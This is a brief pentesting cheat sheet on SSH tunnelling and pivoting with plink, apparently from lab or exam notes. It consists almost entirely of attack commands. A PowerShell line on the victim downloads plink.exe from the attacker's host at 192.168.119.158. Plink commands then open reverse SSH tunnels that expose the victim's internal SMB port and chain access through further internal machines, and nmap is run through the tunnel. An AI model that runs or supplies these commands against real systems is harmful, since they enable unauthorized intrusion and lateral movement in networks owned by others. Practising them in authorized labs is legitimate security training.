Tunneling / (with SSH key)

#victim
netstat -ano #to see undiscovered service during nmap

#kali
python -m http.server 8080 #to host plink
service ssh start

#victim
powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.158:8080/plink.exe','C:/hfs/tmp/plink.exe')

cmd.exe /c echo y | plink.exe -ssh -l kali -pw kalipwd -R 192.168.119.158:7799:127.0.0.1:445 192.168.119.158

#kali
nmap -sT -sV -sC 127.0.0.1 7799 

#machine C
plink.exe -ssh -l b.user -pw b.pwd -N -R 10.1.1.9:1069:127.0.0.1:9050 10.1.1.9

#machine B 10.1.1.9
plink.exe -ssh -l kali -pw kalipwd -N -R 192.168.119.158:7799:127.0.0.1:1069 192.168.119.158